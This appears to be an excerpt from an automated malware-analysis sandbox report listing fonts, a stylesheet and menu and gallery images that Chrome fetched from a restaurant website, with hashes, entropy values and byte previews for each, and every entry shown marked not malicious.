                                                                                                                                                    Preview:/* vietnamese */.@font-face {. font-family: 'Dancing Script';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF4S-kcSWSVi_szLviuEViw.woff2) format('woff2');. unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;.}./* latin-ext */.@font-face {. font-family: 'Dancing Script';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF4S-kcSWSVi_szLuiuEViw.woff2) format('woff2');. unicode-range: U+0100-02AF, U+0304, U+0308, U+0329, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;.}./* latin */.@font-face {. font-family: 'Dancing Script';. font-style: normal;. font-weight: 500;. font-display: swap;. src: url(https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 87 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):37258
                                                                                                                                                    Entropy (8bit):5.883696361162396
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:O50wTdDiwk45LR4U5UsT2TJurWPjOoSrP3/2eiQ62VG5p4RqR8iogjg:0tdDiwZR4U5b4uSjPSrP3/2eiQ1Gogk
                                                                                                                                                    MD5:A40A5D192C15FB7E9837BE7CA4D90987
                                                                                                                                                    SHA1:7E756DCED1420FD44B930895EDEB9DF511987351
                                                                                                                                                    SHA-256:3E659F8A2FEDCF865B20249B433A7724ACFF5A0EDADB0C8C595147636229F3E2
                                                                                                                                                    SHA-512:AE5089BD8C86B59282D9C2A8C1B09CE989F911EC1F9689E6CA096529113F820AEEC335F3EFB2B76F367FB22B8F6CAB2518D9F616A22942588C3B928130ED253D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Prawn_curry.png
                                                                                                                                                    Preview:.PNG........IHDR...W...K.............pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=2109, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=500], baseline, precision 8, 500x2109, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):199934
                                                                                                                                                    Entropy (8bit):7.956706330896888
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:T9zV0canqiplJi5FLiwb+1/00KXXq+r1MW:FWcanqipXiaf1/0j6+hMW
                                                                                                                                                    MD5:2225C906075C629DAAC652D1B2CEA958
                                                                                                                                                    SHA1:AAAC9799C16AD24666F90917B7DA88E52E8813B7
                                                                                                                                                    SHA-256:AE6566E0B4CD08494D7D46D3EE9D3E5EE5DCD56EAE16F2D2719F0A42E602A2D6
                                                                                                                                                    SHA-512:D883CACE747C9317A216CCC8A3ED143A26F6C7E58FF6E60320AFA182221307DD9D80A5F298ECD53B912745794124AD48240B059E32F6819C3B7899299B77B188
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/img_recipe_2.jpg
                                                                                                                                                    Preview:.....qExif..MM.*...........................=...........................................................................(...........1.....".....2..........i.............$.......-....'..-....'.Adobe Photoshop CC 2015 (Windows).2023:09:27 17:27:16.............0221...................................=...............................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................&.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..1..VS..zw<....s.;Y.h.s~...b.~..[...{.......Lz{..k.........F...p...5....Ii
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 900x900, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):133686
                                                                                                                                                    Entropy (8bit):7.897397151920258
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:mD7pomnhfnh4VudWufib3YiCW4uiz+QG8UUUBH:+omhfLcLjCWWz+Q6Uc
                                                                                                                                                    MD5:7F81402512CA35EE24ED83F48DDCA7D4
                                                                                                                                                    SHA1:62A130E9F79EF94D6946E30F87C198AA98A7CC87
                                                                                                                                                    SHA-256:6297D21308C4D951AB1450BCB5E94F1075247C6E0A3B4D279E401E8B7360C56C
                                                                                                                                                    SHA-512:B101DC1B069E5E64DC27E7FBAC886E0324C837A71DF3AC43F8CA58100987E90FCBBCF3F664E8EB83C7C9C2A3EC17853A42A68BC125855EB703D341AA749221B3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....%"Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:42:18....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................14..........14..........14..........0100.....................................................................................................................................0...........1...........2..........4..........5.................................<........2023:08:19 14:54:41.2023:08:19 14:54:41.+10:00.+10:00.+10:00..............................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 55 x 45, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):25627
                                                                                                                                                    Entropy (8bit):3.8515761006332356
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:AfC3qkYqkDWnzz5BcJfAQgeQwlMDYbOBgku:OC3Od5AQ1Q+cu
                                                                                                                                                    MD5:CD2A77EA22F5DF7C8DFFCAEFF8673A4C
                                                                                                                                                    SHA1:B6FA15977A8EEB11ACB789AF40D8CB4A18706F9A
                                                                                                                                                    SHA-256:8C43FB6A832096F2270924C69B5CDF142FAE0CB91C4AE2F6F0B2D03A3828E67B
                                                                                                                                                    SHA-512:C850BE1E4D57E49697380FF9C12657CD90645007E4B408D19AF6B59F2A42B1F4B89B314936E709FCEDC3FF36990C384F098B7F98F1527C21B5D0E514323BD51E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...7...-............pHYs...............V.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:MicrosoftPhoto_1_="http://ns.microsoft.com/photo/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <MicrosoftPhoto_1_:LastKeywordXMP>. <rdf:Bag>. <r
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 94 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):23636
                                                                                                                                                    Entropy (8bit):4.727040621459664
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:YftDetyVLkc25HaYX0ek1/6AH81F0NktlhDezI:mtCEVLkc25UZ1S+8gkxKzI
                                                                                                                                                    MD5:98304057D00F6C3FFC339E2F85B0BDDF
                                                                                                                                                    SHA1:D040B701A67DAD1AAED3B603967E364EEE2BA9D5
                                                                                                                                                    SHA-256:3EE7DC5F24A98212CE2EF49EC1D69B50BE0ADAEDDF220F41F32C0354053256C6
                                                                                                                                                    SHA-512:F83EC709A6FA180A950240C33CFFA96992BE324D55780A203DDF4CD0CA3BAA5071697270ECCCFB32AD9F7A7BB254A5707D9744789FCE6BE22D28580BC027543D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/icon2.png
                                                                                                                                                    Preview:.PNG........IHDR...^...d......3......pHYs...............8%iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2022-07-17T16:12:38+05:30</xmp:CreateDate>. <xmp:ModifyDate>2022-07-17T16:24:27+05:30</xmp:ModifyDate>. <xmp:M
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1600, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1200], progressive, precision 8, 700x373, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):76092
                                                                                                                                                    Entropy (8bit):7.883268706692136
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:ikpcWNmfH4o8RRA4TgYhPDsgSe01+79b+:/cWNDoGRA24gr+
                                                                                                                                                    MD5:8C4A7C6AE85F0C9A308E7B3AE6F92FE4
                                                                                                                                                    SHA1:B0B6CC1FCE23EE90312053B937007809DD2403A1
                                                                                                                                                    SHA-256:334B3EFB27EB117283BD51199E91E8B22F237018755CD58766B12EAA45CC5049
                                                                                                                                                    SHA-512:AD28520935A47AE3490D247A995E3E5FD1A639BDF4F0D5C0E957A2AE06B8A2A2078D2F02F3E140A5193C3B349794308E4D7C5FFB640F6A95AB8E4CCD441CA3C7
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/takAway_2.jpg
                                                                                                                                                    Preview:.....vExif..MM.*...........................@...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:15:39.............0221...................................u...............................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................U...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.........gS..:)SC[.G.#O.|..+U...4....Iq:}...IH.7.......[>?-?....9.,..w!.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], progressive, precision 8, 688x1226, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):188613
                                                                                                                                                    Entropy (8bit):7.937970537200766
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:BD/nWXcq4s4Wt9y08t0HApcZJk3ExHkO5Exg8cJbDOG9D1:B/nocTsZtr8t0AO7kO5FJP1
                                                                                                                                                    MD5:66B494322BD7C0945B4FE57271E3CDE7
                                                                                                                                                    SHA1:43CC13C7D86B26EC75C0D3BE9DF0080AC6EE2B20
                                                                                                                                                    SHA-256:E3010C148A387205CBD2AC79F13F57404788E8D272263AD3215584C8EDDE4230
                                                                                                                                                    SHA-512:69D8C4DEFFCE39B00438BE3720FF6F6F590B9E983D63F9994DF2EB1341E20E8ECCF7603A7A06699F236D7F9B5A5DDE13071E0DEC3814483112FA23E0A2CF95FD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.....OExif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:10:05 17:10:47....)...........2...........:."...........'.......@...0...........2.........@........0231...........B...........V...........j...........q...........x........................................................................................................63..........63..........63..........0100....................................................................................................................................0...........1...........2..........4..........5.................................}...8....2023:08:19 15:27:52.2023:08:19 15:27:52.+10:00.+10:00.+10:00............................%.................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (569)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):161927
                                                                                                                                                    Entropy (8bit):4.846625229394999
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:RycHbsqqs8THUTpJRpgVMASzjzpQTzNZndb/zDL4iDF4j9:R50THUmb/zDL4iDF4j9
                                                                                                                                                    MD5:431EB1BF92FACFEE2E1DB7FE89926D60
                                                                                                                                                    SHA1:CD5D91240E4BBBA0098C228C1C945713DA57BE79
                                                                                                                                                    SHA-256:E5AB7DD4AD2DD90C9B4FF8BF2CABB50A7687F3990F569B16EACB26E0466D0AC0
                                                                                                                                                    SHA-512:CA5B14915963F0C2C8DC266F3D6BDAFFBCF2968F8F90E460EFA5A1E773C95C3EEE90FC67CA078E135B09D28C558ECEDCF0F22B00BD79BC782B94D87EB0000BB3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/css/foodhut.css
                                                                                                                                                    Preview:.:root {. --blue: #79A9F5;. --indigo: #C45F90;. --purple: #A16AE8;. --pink: #ff214f;. --red: #F85C70;. --orange: #FF8882;. --yellow: #FAD02C;. --green: #A3C14A;. --teal: #20c997;. --cyan: #47D8E0;. --white: #fff;. --gray: #6c757d;. --gray-dark: #343a40;. --primary: #ff214f;. --secondary: #6c757d;. --success: #A3C14A;. --info: #47D8E0;. --warning: #FF8882;. --danger: #F85C70;. --light: #f8f9fa;. --dark: #343a40;. --breakpoint-xs: 0;. --breakpoint-sm: 576px;. --breakpoint-md: 768px;. --breakpoint-lg: 992px;. --breakpoint-xl: 1200px;. --font-family-sans-serif: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, "Noto Sans", sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";. --font-family-monospace: SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;.}..*,.*::before,.*::after {. box-sizing: border-box;.}..html {. font-family: sans-serif;. line-height: 1.15;.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 1300 x 516, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):269477
                                                                                                                                                    Entropy (8bit):7.86155947959922
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:Vww5H0rvqpx9XscYc+6DrtKrS1DeU29KJVXf:VwwSzqpX1Yd6DhKrS1DeU29KLP
                                                                                                                                                    MD5:2692C22462D44AC9B7A76316694D047C
                                                                                                                                                    SHA1:F03E6A7CDE005C111B1267732BAD140D61A51137
                                                                                                                                                    SHA-256:D4D74F6A711DE2C3E4776367BB33B9DB95FEE1DCE087D9CE047995D9BE497CA7
                                                                                                                                                    SHA-512:59B189051581977DAFB679F2DF53FC5BD4337F77FAA4D34A8774FC83D32B12C659D63DECE817FB8504D661B212D0399C4B372D5D6D993777D24713F64D26E40E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/Banner_contact_image.png
                                                                                                                                                    Preview:.PNG........IHDR.............h.......pHYs................:iCCPPhotoshop ICC profile..x...K.a...o.8..S.....A.A1........P...S..q..Df.`.k.D.-...L.`.....`0.$.... ......B.3'.^ ..-.&.g"f...".E#......x|._.=#..C9......iO._..t\.b.....@l...u.."`.f..Q..L.+.a7..0..,.G`*..v.7w.4...Q.=..`..."?.......*~.>..O.J~.O..../~.<..C.z.;.ns..x.......`-4.......b..(..g.}...x.y{P.{.....S.!Y....C.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 86 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):36125
                                                                                                                                                    Entropy (8bit):5.768276573722191
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:750wRdDiXkT5tU5evx6oyNrX6QAaS3WpLQ1JAjkE5SsXdT:NDdDiXUU5evxydeau13AltT
                                                                                                                                                    MD5:D3CB337BB8CD77874A8294B3B6FC5F20
                                                                                                                                                    SHA1:C91BA2ECFB05446F0B90C5EC70861A11C257E10F
                                                                                                                                                    SHA-256:40E0F569C2DAE9218E903CB18E0D2F9E127167D02E6D74A9F5E7D07705AC4F75
                                                                                                                                                    SHA-512:1BB21763504AD256E95DD63500871927806F9E6644D9B42E996DEFA62A7F2F44E8A035FB36262A4408DE39D76E03E44AF588B59FE3084CBF07DC81F4026BD226
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Cauliflower_Curry.png
                                                                                                                                                    Preview:.PNG........IHDR...V...K.......p.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 1105x831, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):370443
                                                                                                                                                    Entropy (8bit):7.971610840142179
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:vF6btZKkeBTP4/yGhrkveZqpHsATDhdSn+q06MeNKMf1/s0quBUZAZWFcpAbMW:ohFVyMr2KqpHXrosd/mFs0quBUZAwFcq
                                                                                                                                                    MD5:4ED035C4C57D29721EBBD7774B045823
                                                                                                                                                    SHA1:1B5BB03F93019055345559DED941EB069FAC224E
                                                                                                                                                    SHA-256:8DA940508CDAE66F5148AAD9542B2D4FAFCB5816B79EAE228A74110165A44E7C
                                                                                                                                                    SHA-512:442F0DB986D63D9E5A4C2983A6D5BC9BA0A0F0EFF4FBAA3CBE447F7FC6904AB7FC70D5E152DA88D6DB598A679A085643189455B47F5578E3DE744E11439A4815
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....#.Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:07:37....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................65..........65..........65..........0100.......................Q...........?.................................................................................................0...........1...........2..........4..........5.................................P...-....2023:08:19 14:35:06.2023:08:19 14:35:06.+10:00.+10:00.+10:00...`.......`..................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 900x900, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):133686
                                                                                                                                                    Entropy (8bit):7.897397151920258
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:mD7pomnhfnh4VudWufib3YiCW4uiz+QG8UUUBH:+omhfLcLjCWWz+Q6Uc
                                                                                                                                                    MD5:7F81402512CA35EE24ED83F48DDCA7D4
                                                                                                                                                    SHA1:62A130E9F79EF94D6946E30F87C198AA98A7CC87
                                                                                                                                                    SHA-256:6297D21308C4D951AB1450BCB5E94F1075247C6E0A3B4D279E401E8B7360C56C
                                                                                                                                                    SHA-512:B101DC1B069E5E64DC27E7FBAC886E0324C837A71DF3AC43F8CA58100987E90FCBBCF3F664E8EB83C7C9C2A3EC17853A42A68BC125855EB703D341AA749221B3
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallery_N3.jpg
                                                                                                                                                    Preview:....%"Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:42:18....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................14..........14..........14..........0100.....................................................................................................................................0...........1...........2..........4..........5.................................<........2023:08:19 14:54:41.2023:08:19 14:54:41.+10:00.+10:00.+10:00..............................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 290x290, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):80554
                                                                                                                                                    Entropy (8bit):7.849045795725211
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:I+I04mxxQ5004mxxQ5fcVWcLMNHMpPpqi9BA8p/LuO8s+4xVD88C90kcp:I980080kktwTBAM/aO8sdVD811+
                                                                                                                                                    MD5:49A4B8BD91134C5456957A8FD0015EC2
                                                                                                                                                    SHA1:60BC713DD13EDEDD9BF45831F4ECCEDF44C3FEAF
                                                                                                                                                    SHA-256:4C82F9A7383A3B1ABC4F0086500213796B56E76DC55F9CFCDAE4283A3AF94851
                                                                                                                                                    SHA-512:4B2639E040DA80E2F1096E1F1C2BFDA37A4148AFEC03EA2843D0D48660B12D8226F32BC7CE4899555954E89923BF4DF131BB90E5B6FB0FF5BD28408F84E76A51
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....).Exif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:27 19:56:47....)...........2...........:."...........'...........0...........2..................0231...........B...........V...........j...........q...........x........................................................................................................45..........45..........45..........0100......................."...........".................................................................................................0...........1...........2..........4..........5.................................<...-....2023:08:19 15:41:31.2023:08:19 15:41:31.+10:00.+10:00.+10:00...........`..................................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x467, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):87549
                                                                                                                                                    Entropy (8bit):7.9024625242595965
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:cXpyXpdhALs1/4NxJXlhFzJNTheQ4Ez1ftZksVOQ+LqvP6wZUrhnMpN:EeX0xRjNTsK1ft1VTzqw+r1ML
                                                                                                                                                    MD5:EBBCB35810CB9D14E5B080A7D1D5C516
                                                                                                                                                    SHA1:07BDC00460392473243CBE80E1D9693820E7E112
                                                                                                                                                    SHA-256:5DEF399EE4B272FC1B5079BD71D9C991C3FB3D2E46B5A8D94153212922E3AA6C
                                                                                                                                                    SHA-512:478FEC376CB5D5691915D917171C961C7651F3CA77180192CECA448803E6B3A065D52C8BDF45B1BD985C49C15B65AD47E947A254DB5BD1A9CDBE359DDF6EBC59
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/res_menu2.jpg
                                                                                                                                                    Preview:....$.Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 12:22:22.............0221...................................................................r...........z.(................................#........H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................k...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...C=.......{5.,.^..WV.mo.'.%..n....^1.h..=...Kw..jG....Z......}U....N...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 4468x3918, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):1627844
